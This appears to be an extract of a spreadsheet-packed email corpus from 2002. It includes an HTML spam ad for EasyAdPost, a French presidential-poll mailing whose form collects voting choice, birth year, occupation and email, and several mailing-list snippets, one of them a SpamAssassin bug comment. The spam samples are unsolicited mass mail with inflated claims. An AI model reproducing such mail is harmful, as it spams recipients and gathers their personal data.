 Content-Type: text/html
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;EasyAdPost.com&lt;/title&gt;
 &lt;meta http-equiv=3D=22Content-Type=22 content=3D=22text/html; charset=3Diso-8859-1=22&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D=22EBF1F8=22 text=3D=22=23000000=22&gt;
 &lt;table width=3D=22500=22 border=3D=220=22 cellspacing=3D=220=22 cellpadding=3D=220=22&gt;
   &lt;tr&gt;=20    &lt;td bgcolor=3D=22=23FFFFFF=22 height=3D=2215=22 align=3D=22center=22&gt; &lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;&lt;b&gt;&lt;font color=3D=22=23FF0000=22&gt;http://www.efi.ie/index-1998-07-16.html&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;=20    &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20    &lt;td bgcolor=3D=22=23FFFFFF=22 align=3D=22center=22&gt;=20      &lt;table width=3D=22446=22 border=3D=220=22 cellspacing=3D=220=22 cellpadding=3D=220=22&gt;
         &lt;tr&gt;
           &lt;td&gt;
             &lt;table border=3D=220=22 cellspacing=3D=220=22 cellpadding=3D=220=22&gt;
               &lt;tr align=3D=22center=22 valign=3D=22top=22&gt;=20                &lt;td colspan=3D=223=22 height=3D=2241=22&gt;=20                  &lt;p&gt;&lt;a href=3D=22http://www.easyadpost.com=22 target=3D=22_blank=22&gt;&lt;img src=3D=22http://imgdef.easyadpost.com/addef/em_01.gif=22 width=3D=22446=22 height=3D=2241=22 border=3D=220=22&gt;&lt;/a&gt;&lt;/p&gt;
                   &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20                &lt;td width=3D=2296=22&gt;&lt;a href=3D=22http://www.easyadpost.com=22 target=3D=22_blank=22&gt;&lt;img src=3D=22http://imgdef.easyadpost.com/addef/em_04.gif=22 width=3D=2296=22 height=3D=22160=22 border=3D=220=22&gt;&lt;/a&gt;&lt;/td&gt;
                 &lt;td width=3D=22241=22&gt;&lt;a href=3D=22http://www.easyadpost.com=22 target=3D=22_blank=22&gt;&lt;img src=3D=22http://image1.easyadpost.com/adbmp/2/27/sna170.jpg=22 width=3D=22241=22 height=3D=22160=22 border=3D=220=22&gt;&lt;/a&gt;&lt;/td&gt;
                 &lt;td width=3D=22109=22&gt;&lt;a href=3D=22http://www.easyadpost.com=22 target=3D=22_blank=22&gt;&lt;img src=3D=22http://imgdef.easyadpost.com/addef/em_05.gif=22 width=3D=22109=22 height=3D=22160=22 border=3D=220=22&gt;&lt;/a&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20                &lt;td width=3D=2296=22&gt;&lt;img src=3D=22http://imgdef.easyadpost.com/addef/em_06.gif=22 height=3D=226=22 border=3D=220=22&gt;&lt;/td&gt;
                 &lt;td width=3D=22241=22&gt;&lt;img src=3D=22http://imgdef.easyadpost.com/addef/em_07.gif=22 height=3D=226=22 border=3D=220=22&gt;&lt;/td&gt;
                 &lt;td width=3D=22109=22&gt;&lt;img src=3D=22http://imgdef.easyadpost.com/addef/em_08.gif=22 width=3D=22109=22 height=3D=226=22 border=3D=220=22&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td&gt;&lt;a href=3D=22http://www.easyadpost.com=22 target=3D=22_blank=22&gt;&lt;img src=3D=22http://imgdef.easyadpost.com/addef/em_09.gif=22 width=3D=22446=22 height=3D=2289=22 border=3D=220=22&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
      =20    &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td bgcolor=3D=22=23FFFFFF=22&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20    &lt;td bgcolor=3D=22=23FFFFFF=22&gt;
       &lt;table width=3D=22517=22 border=3D=220=22 cellspacing=3D=220=22 cellpadding=3D=220=22&gt;
         &lt;tr&gt;=20          &lt;td&gt;=20            &lt;table width=3D=22480=22 border=3D=220=22 cellspacing=3D=220=22 cellpadding=3D=220=22&gt;
               &lt;tr&gt;=20                &lt;td width=3D=2250=22&gt;=20                  &lt;p&gt;&lt;font face=3D=22Geneva, Arial, Helvetica, san-serif=22&gt;&lt;br&gt;
                     &lt;/font&gt; &lt;/p&gt;
                 &lt;/td&gt;
                 &lt;td&gt;
                   &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;&lt;b&gt;&lt;font color=3D=22=23FF0000=22&gt;EasyAdPost.com=20                    --&lt;/font&gt;&lt;br&gt;
                     &lt;font color=3D=22=233399FF=22&gt;Promote your Products and Services on=20                    Thousands of Classified Sites.&lt;br&gt;
                     Simply the Best Way to Sell on the Internet=21 &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;=20                  &lt;/p&gt;
                   &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;No=20                    time to post an ad for your business?&lt;br&gt;
                     Struggling with numerous classified sites?&lt;br&gt;
                     Seeking effective means to promote your business?&lt;/font&gt; &lt;/p&gt;
                   &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;All=20                    of these are great reasons for you to visit EasyAdPost.com.=20                    Currently EasyAdPost.com boasts a database of 120,000+ popular=20                    classified sites, to which we will submit your classified=20                    ad quickly and effectively. We will as well submit your business=20                    site URL or Logo URL to hundreds of thousands of search engines=20                    and directories worldwide. Quickly and effectively, EasyAdPost.com=20                    will attract potentially millions of people to your business=20                    on the Internet, without any hidden cost for advertising=21&lt;/font&gt;&lt;/p&gt;
                   &lt;p align=3D=22center=22&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;Visit=20                    Links below for More Details&lt;/font&gt;&lt;/p&gt;
                   &lt;p align=3D=22center=22&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;***********************************************&lt;/font&gt;&lt;/p&gt;
                   &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;To=20                    learn the generals about EasyAdPost, view &lt;a href=3D=22http://www.easyadpost.com=22 target=3D=22_blank=22&gt;http://www.easyadpost.com&lt;/a&gt;&lt;br&gt;
                     &lt;br&gt;
                     To browse the sample list of classified sites, go to &lt;a href=3D=22http://www.easyadpost.com/sample.php%20=22 target=3D=22_blank=22&gt;http://www.easyadpost.com/sample.php&lt;/a&gt;=20                    &lt;/font&gt;&lt;/p&gt;
                   &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;Questions=20                    or comments? Post your Query Form to us at &lt;a href=3D=22http://www.easyadpost.com/aboutus.php=22 target=3D=22_blank=22&gt;http://www.easyadpost.com/aboutus.php&lt;/a&gt;=20                    &lt;/font&gt;&lt;/p&gt;
                   &lt;p align=3D=22center=22&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;***********************************************&lt;/font&gt;&lt;/p&gt;
                   &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;Spend=20                    your market dollar wisely and good luck to your business=21&lt;/font&gt;&lt;/p&gt;
                   &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;Peterson=20                    Slade&lt;br&gt;
                     &lt;a href=3D=22mailto:customer=40easyadpost.com=22&gt;customer=40easyadpost.com&lt;/a&gt;&lt;br&gt;
                     EasyAdPost.com&lt;br&gt;
                     &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 --=_NextPart_2rfkindysadvnqw3nerasdf--
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Harri wrote :
 &gt; Title page has a login screen and I can't seem to get the apt indexes
 &gt; anymore. Is it just me or is something going on there?
 You can't get the file index from here either?
 http://apt.nixia.no/apt/files/
 During the past few days, I've experienced connection problems with that
 site from time to time, but for me right now it's working.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</si>
  <si>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Le dernier sondage avant les lections presidentielles 2002 !
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_84815C5ABAF209EF376268C8
 Content-type: text/plain; charset="US-ASCII"
 ------=_NextPart_84815C5ABAF209EF376268C8
 Content-Type: text/html; charset="US-ASCII"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Untitled Document&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
 -1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000" topmargin=3D"0" marginheight=3D=
 "0"&gt;
 &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpadding=3D"=
 0"&gt;
         &lt;tr&gt;
           &lt;td width=3D"350"&gt;&lt;font size=3D"4" face=3D"Verdana, Arial, Helve=
 tica, sans-serif"&gt;&lt;b&gt;&lt;font size=3D"6"&gt;&lt;img src=3D"http://www=2Eimp20=2Ecom=
 /sondageexpress/logosondageexpress=2Egif" width=3D"356" height=3D"55"&gt;&lt;/fo=
 nt&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;
             &lt;div align=3D"center"&gt;&lt;font size=3D"2" face=3D"Verdana, Arial,=
  Helvetica, sans-serif"&gt;&lt;b&gt;En=20
               partenariat avec&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
           &lt;td width=3D"200"&gt;=20
             &lt;div align=3D"right"&gt;&lt;a href=3D"http://www=2Eok2mail=2Ecom"&gt;&lt;i=
 mg src=3D"http://www=2Eok2mail=2Ecom/Images/logo=2Egif" border=3D"0"&gt;&lt;/a&gt;&lt;=
 /div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;font size=3D"4" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;=
 font size=3D"6"&gt;&lt;br&gt;
       &lt;font size=3D"3"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/font&gt;&lt;font size=3D"3"&gt; &lt;=
 /font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt; &lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;=
 b&gt;&lt;i&gt;&lt;u&gt;Le=20
       dernier sondage avant le second tour des &amp;eacute;lections pr&amp;eacute;=
 sidentielles=20
       2002&lt;br&gt;
       &lt;br&gt;
       &lt;/u&gt; &lt;/i&gt; &lt;/b&gt; Sondage Express r&amp;eacute;alise le dernier sondage ava=
 nt le=20
       second tour des &amp;eacute;lections pr&amp;eacute;sidentielles=2E Les r&amp;eac=
 ute;sultats=20
       seront envoy&amp;eacute;s par e-mail &amp;agrave; tous les participants avan=
 t les=20
       24 et 26 avril et le 3 mai 2002 &amp;agrave; minuit &lt;b&gt;par e-mail&lt;/b&gt;=2E=
 &lt;br&gt;
       &lt;br&gt;
       &lt;u&gt;&lt;b&gt;Pour quel candidat allez vous voter le dimanche 5 mai 2002 ?&lt;b=
 r&gt;
       &lt;br&gt;
       &lt;/b&gt;&lt;/u&gt;&lt;b&gt; &lt;/b&gt; &lt;/font&gt;=20
       &lt;FORM name=3Dpresidentielle action=3D"http://www=2Elettredumarketing=
 =2Ecom/cgi-bin/sondageexpress=2Ecgi" method=3Dpost&gt;
 =09  &lt;INPUT type=3Dhidden value=3D"candidat,choix,1e_tour,civilite,anneede=
 naissance,situation, email" name=3Dparam_order&gt;
 =09  &lt;INPUT type=3Dhidden value=3Dsondageexpress=2Etxt name=3Dparam_databa=
 se&gt;
         &lt;INPUT type=3Dhidden name=3Dparam_required&gt;
         &lt;table width=3D"100%" border=3D"1" cellspacing=3D"0" cellpadding=3D=
 "0"&gt;
           &lt;tr&gt;
             &lt;td height=3D"151"&gt;=20
               &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpad=
 ding=3D"2"&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"50%" valign=3D"top" height=3D"71"&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" c=
 ellpadding=3D"1"&gt;
                       &lt;tr valign=3D"top"&gt;=20
                         &lt;td width=3D"24" height=3D"100"&gt; &lt;font face=3D"Ver=
 dana, Arial, Helvetica, sans-serif" size=3D"1"&gt;=20
                           &lt;input type=3D"radio" name=3D"candidat" value=3D=
 "chirac"&gt;
                           &lt;/font&gt;&lt;/td&gt;
                         &lt;td   width=3D"59" height=3D"100"&gt;&lt;font face=3D"Ve=
 rdana, Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;img src=3D"http://www=2Ei=
 mp20=2Ecom/sondageexpress/chirac=2Ejpg"&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td height=3D"100" width=3D"361"&gt;&lt;font face=3D"Ver=
 dana, Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;b&gt;Jacques=20
                           Chirac&lt;br&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;font face=3D"Verdana, Arial, Helveti=
 ca, sans-serif" size=3D"1"&gt;&amp;#149;=20
                           Parti politique : Rassemblement pour la R&amp;eacute=
 ;publique&lt;br&gt;
                           &lt;/font&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"1"&gt;&amp;#149;=20
                           &amp;Acirc;ge : 69 ans&lt;br&gt;
                           &lt;/font&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"1"&gt;&amp;#149;=20
                           Situation de famille : Mari&amp;eacute; et p&amp;egrave;=
 re de=20
                           deux filles&lt;br&gt;
                           &lt;/font&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"1"&gt;&amp;#149;=20
                           M&amp;eacute;tier d'origine : Haut-fonctionnaire&lt;br&gt;=
                           &lt;/font&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"1"&gt;&amp;#149;=20
                           Mandat en cours : Pr&amp;eacute;sident de la R&amp;eacut=
 e;publique=20
                           depuis 1995&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"50%" valign=3D"top" height=3D"71"&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" c=
 ellpadding=3D"1"&gt;
                       &lt;tr valign=3D"top"&gt;=20
                         &lt;td width=3D"24" height=3D"83"&gt; &lt;font face=3D"Verd=
 ana, Arial, Helvetica, sans-serif" size=3D"1"&gt;=20
                           &lt;input type=3D"radio" name=3D"candidat" value=3D=
 "lepen"&gt;
                           &lt;/font&gt;&lt;/td&gt;
                         &lt;td   width=3D"63" height=3D"83"&gt;&lt;font face=3D"Ver=
 dana, Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;img src=3D"http://www=2Eim=
 p20=2Ecom/sondageexpress/Lepen=2Ejpg"&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td height=3D"83" width=3D"356"&gt;&lt;font face=3D"Verd=
 ana, Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;b&gt;Jean-Marie=20
                           Le Pen&lt;br&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;font face=3D"Verdana, Arial, Helveti=
 ca, sans-serif" size=3D"1"&gt;&amp;#149;=20
                           Parti politique : Front national&lt;br&gt;
                           &lt;/font&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"1"&gt;&amp;#149;=20
                           &amp;Acirc;ge : 73 ans&lt;br&gt;
                           &lt;/font&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"1"&gt;&amp;#149;=20
                           Situation de famille : P&amp;egrave;re de trois fill=
 es&lt;br&gt;
                           &lt;/font&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"1"&gt;&amp;#149;=20
                           M&amp;eacute;tier d&amp;#146;origine : Chef d&amp;#146;entre=
 prise&lt;br&gt;
                           &lt;/font&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"1"&gt;&amp;#149;=20
                           Mandats en cours : D&amp;eacute;put&amp;eacute; europ&amp;ea=
 cute;en=20
                           depuis 1984&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br&gt;
               &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpad=
 ding=3D"1"&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"20"&gt;=20
                     &lt;input type=3D"radio" name=3D"candidat" value=3D"abste=
 ntion"&gt;
                   &lt;/td&gt;
                   &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"=
  size=3D"2"&gt;&lt;b&gt;Je=20
                     ne voterai pas&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpad=
 ding=3D"1"&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"20"&gt;=20
                     &lt;input type=3D"radio" name=3D"candidat" value=3D"nsp"&gt;=
                   &lt;/td&gt;
                   &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"=
  size=3D"2"&gt;&lt;b&gt;NSP&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
              =20
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;br&gt;
         &lt;table width=3D"100%" border=3D"1" cellspacing=3D"0" cellpadding=3D=
 "0"&gt;
           &lt;tr&gt;
             &lt;td&gt;
               &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpad=
 ding=3D"1"&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"20"&gt;=20
                     &lt;input type=3D"radio" name=3D"choix" value=3D"certain"=
 &gt;
                   &lt;/td&gt;
                   &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"=
  size=3D"2"&gt;&lt;b&gt;Je=20
                     suis certain de mon choix&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"20"&gt;=20
                     &lt;input type=3D"radio" name=3D"choix" value=3D"non_defi=
 nitif"&gt;
                   &lt;/td&gt;
                   &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"=
  size=3D"2"&gt;&lt;b&gt;Mon=20
                     choix n'est pas encore d&amp;eacute;finitif&lt;/b&gt;&lt;/font&gt;&lt;/td=
 &gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;br&gt;
         &lt;table width=3D"100%" border=3D"1" cellspacing=3D"0" cellpadding=3D=
 "4"&gt;
           &lt;tr&gt;
             &lt;td height=3D"8"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, s=
 ans-serif" size=3D"2"&gt;Pour=20
               quel candidat avez vous vot&amp;eacute; au 1er tour ?&lt;/font&gt;&lt;/b&gt;=
 =20
               &lt;select name=3D"1e_tour"&gt;
                 &lt;option value=3D"Choisir"&gt;Choisir&lt;/option&gt;
                 &lt;option value=3D"abstention"&gt;Je n'ai pas vot&amp;eacute;&lt;/opti=
 on&gt;
                 &lt;option value=3D"A=2E Laguiller"&gt;A=2E Laguiller&lt;/option&gt;
                 &lt;option value=3D"A=2E Madelin"&gt;A=2E Madelin&lt;/option&gt;
                 &lt;option value=3D"B=2E Megret"&gt;B=2E Megret&lt;/option&gt;
                 &lt;option value=3D"C=2E Boutin"&gt;C=2E Boutin&lt;/option&gt;
                 &lt;option value=3D"C=2E Lepage"&gt;C=2E Lepage&lt;/option&gt;
                 &lt;option value=3D"C=2E Taubira"&gt;C=2E Taubira&lt;/option&gt;
                 &lt;option value=3D"D=2E Gluckstein"&gt;D=2E Gluckstein&lt;/option&gt;=
                 &lt;option value=3D"F=2E Bayrou"&gt;F=2E Bayrou&lt;/option&gt;
                 &lt;option value=3D"J=2E Chirac"&gt;J=2E Chirac&lt;/option&gt;
                 &lt;option value=3D"J=2E Saint-Josse"&gt;J=2E Saint-Josse&lt;/optio=
 n&gt;
                 &lt;option value=3D"J=2EM=2E Le Pen"&gt;J=2EM=2E Le Pen&lt;/option&gt;=
                 &lt;option value=3D"J=2EP=2E Chevenement"&gt;J=2EP=2E Chevenemen=
 t&lt;/option&gt;
                 &lt;option value=3D"L=2E Jospin"&gt;L=2E Jospin&lt;/option&gt;
                 &lt;option value=3D"N=2E Mamere"&gt;N=2E Mamere&lt;/option&gt;
                 &lt;option value=3D"O=2E Besancenot"&gt;O=2E Besancenot&lt;/option&gt;=
                 &lt;option value=3D"R=2E Hue"&gt;R=2E Hue&lt;/option&gt;
               &lt;/select&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;br&gt;
         &lt;table width=3D"100%" border=3D"1" cellspacing=3D"0" cellpadding=3D=
 "0"&gt;
           &lt;tr&gt;
             &lt;td&gt;
               &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpad=
 ding=3D"2"&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"17%"&gt;&lt;font face=3D"Verdana, Arial, Helvetic=
 a, sans-serif" size=3D"2"&gt;Votre=20
                     civilit&amp;eacute; :&lt;/font&gt;&lt;/td&gt;
                   &lt;td width=3D"17%"&gt; &lt;font face=3D"Verdana, Arial, Helveti=
 ca, sans-serif" size=3D"2"&gt;=20
                     &lt;select name=3D"civilite"&gt;
                       &lt;option value=3D"Mr"&gt;Mr&lt;/option&gt;
                       &lt;option value=3D"Mme"&gt;Mme&lt;/option&gt;
                       &lt;option value=3D"Mlle"&gt;Mlle&lt;/option&gt;
                     &lt;/select&gt;
                     &lt;/font&gt;&lt;/td&gt;
                   &lt;td width=3D"20%"&gt;&lt;font face=3D"Verdana, Arial, Helvetic=
 a, sans-serif" size=3D"2"&gt;Ann&amp;eacute;e=20
                     de naissance :&lt;/font&gt;&lt;/td&gt;
                   &lt;td width=3D"14%"&gt; &lt;font face=3D"Verdana, Arial, Helveti=
 ca, sans-serif" size=3D"2"&gt;=20
                     &lt;input type=3D"text" name=3D"anneedenaissance" value=3D=
 "19??" size=3D"4" maxlength=3D"4"&gt;
                     &lt;/font&gt;&lt;/td&gt;
                   &lt;td width=3D"17%"&gt;&lt;font face=3D"Verdana, Arial, Helvetic=
 a, sans-serif" size=3D"2"&gt;Votre=20
                     situation : &lt;/font&gt;&lt;/td&gt;
                   &lt;td width=3D"17%"&gt; &lt;font face=3D"Verdana, Arial, Helveti=
 ca, sans-serif" size=3D"2"&gt;=20
                     &lt;select name=3D"situation"&gt;
                       &lt;option value=3D"Agriculteur, p=EAcheur"&gt;Agriculteur=
 , p=EAcheur&lt;/option&gt;
                       &lt;option value=3D"Artisan"&gt;Artisan&lt;/option&gt;
                       &lt;option value=3D"Cadre, ing=E9nieur"&gt;Cadre, ing=E9ni=
 eur&lt;/option&gt;
                       &lt;option value=3D"Commer=E7ant"&gt;Commer=E7ant&lt;/option&gt;=
                       &lt;option value=3D"Dirigeant(e), cadre sup=E9rieur"&gt;Di=
 rigeant(e),=20
                       cadre sup=E9rieur&lt;/option&gt;
                       &lt;option value=3D"Employ=E9(e) ou =E9quivalent"&gt;Emplo=
 y=E9(e) ou =E9quivalent&lt;/option&gt;
                       &lt;option value=3D"Enseignant(e), chercheur(se)"&gt;Ensei=
 gnant(e),=20
                       chercheur(se)&lt;/option&gt;
                       &lt;option value=3D"Etudiant(e)"&gt;Etudiant(e)&lt;/option&gt;
                       &lt;option value=3D"Femme ou Homme au foyer"&gt;Femme ou H=
 omme au=20
                       foyer&lt;/option&gt;
                       &lt;option value=3D"Profession lib=E9rale"&gt;Profession l=
 ib=E9rale&lt;/option&gt;
                       &lt;option value=3D"Prof=2E artistique ou sportive"&gt;Pro=
 f=2E artistique=20
                       ou sportive&lt;/option&gt;
                       &lt;option value=3D"Ouvrier(e)"&gt;Ouvrier(e)&lt;/option&gt;
                       &lt;option value=3D"Retrait=E9(e)"&gt;Retrait=E9(e)&lt;/optio=
 n&gt;
                       &lt;option value=3D"Sans profession"&gt;Sans profession&lt;/o=
 ption&gt;
                       &lt;option value=3D"Technicien, agent de ma=EEtrise"&gt;Te=
 chnicien,=20
                       agent de ma=EEtrise&lt;/option&gt;
                     &lt;/select&gt;
                     &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;br&gt;
         &lt;i&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2"=
 &gt;Si vous=20
         souhaitez recevoir le resultat du sondage par mail, precisez votre=
  Email=20
         : &lt;/font&gt; &lt;/i&gt;
 &lt;input type=3D"text" name=3D"email"&gt;
         &lt;p&gt;&lt;br&gt;
           &lt;input type=3D"submit" name=3D"Submit" value=3D"Valider le formu=
 laire"&gt;
       &lt;/form&gt;
        =20
       &lt;br&gt;
         &lt;br&gt;
       &lt;font size=3D"2"&gt;&lt;i&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-se=
 rif"&gt;Attention=20
       : ce sondage non nominatif est adress&amp;eacute; &amp;agrave; un panel de 1=
 00 000=20
       internautes=2E Il ne peut en aucun cas &amp;ecirc;tre consid&amp;eacute;r&amp;ea=
 cute;=20
       comme repr&amp;eacute;sentatif de la population fran&amp;ccedil;aise et ne d=
 oit=20
       en aucun cas porter une influence quelconque sur les votes r&amp;eacute;=
 els=20
       des &amp;eacute;lections pr&amp;eacute;sidentielles du dimanche 5 mai 2002=2E=
  Aucun=20
       fichier informatique nominatif n'est constitu&amp;eacute; par Sondage Ex=
 press&amp;reg;=2E&lt;br&gt;
       R&amp;eacute;sultat pris en compte jusqu'au vendredi 3 mai &amp;agrave; 18h0=
 0=2E&lt;br&gt;
       &lt;br&gt;
       &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/font&gt;&lt;/i&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;
 =09&lt;form action=3D"http://www=2Eimp20=2Ecom/cgi-bin/formmail=2Epl" method=3D=
 "post" target=3D"_top" name=3D"Send"&gt; &lt;INPUT name=3Drecipient type=3Dhidde=
 n value=3Dsondexpress@imp20=2Ecom&gt;&lt;INPUT name=3Dredirect type=3Dhidden val=
 ue=3D"http://www=2Eimp20=2Ecom/sondageexpress/merci=2Ehtm"&gt; &lt;INPUT name=3D=
 subject type=3Dhidden value=3D"Desinscription_SondageExpress"&gt;
         &lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;i=
 &gt;Pour ne=20
         plus participer aux sondages express, indiquez votre email dans le=
  champs=20
         ci-dessous et validez :&lt;br&gt;
         Email : &lt;/i&gt;&lt;/font&gt; &lt;i&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sa=
 ns-serif"&gt;=20
         &lt;input type=3D"text" name=3D"textfield"&gt;
         &lt;input type=3D"submit" name=3D"Valider" value=3D"Valider"&gt;
       &lt;/font&gt;&lt;/i&gt; &lt;/form&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_84815C5ABAF209EF376268C8--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 886] Add a rule to detect Content-type message/partial
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=886
 ------- Additional Comments From jm@jmason.org  2002-09-21 16:37 -------
 I'd prefer to wait and see if spammers do anything about it.  my
 guess is they will not, as it'd mean modifying their spamware to
 send &gt;1 msg per recipient.
 I vote WONTFIX as a result ;)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</si>
  <si>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see my first line: I READ THE LINKS.  brickbats.  idiot.
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Owen
 Byrne
 Sent: Sunday, October 06, 2002 9:21 AM
 To: johnhall@evergo.net
 Cc: 'Geege Schuman'; 'FoRK'
 Subject: Re: Our friends the Palestinians, Our servants in government.
 John Hall wrote:
 &gt;It wasn't gloating, it was one for the horror file.
 &gt;
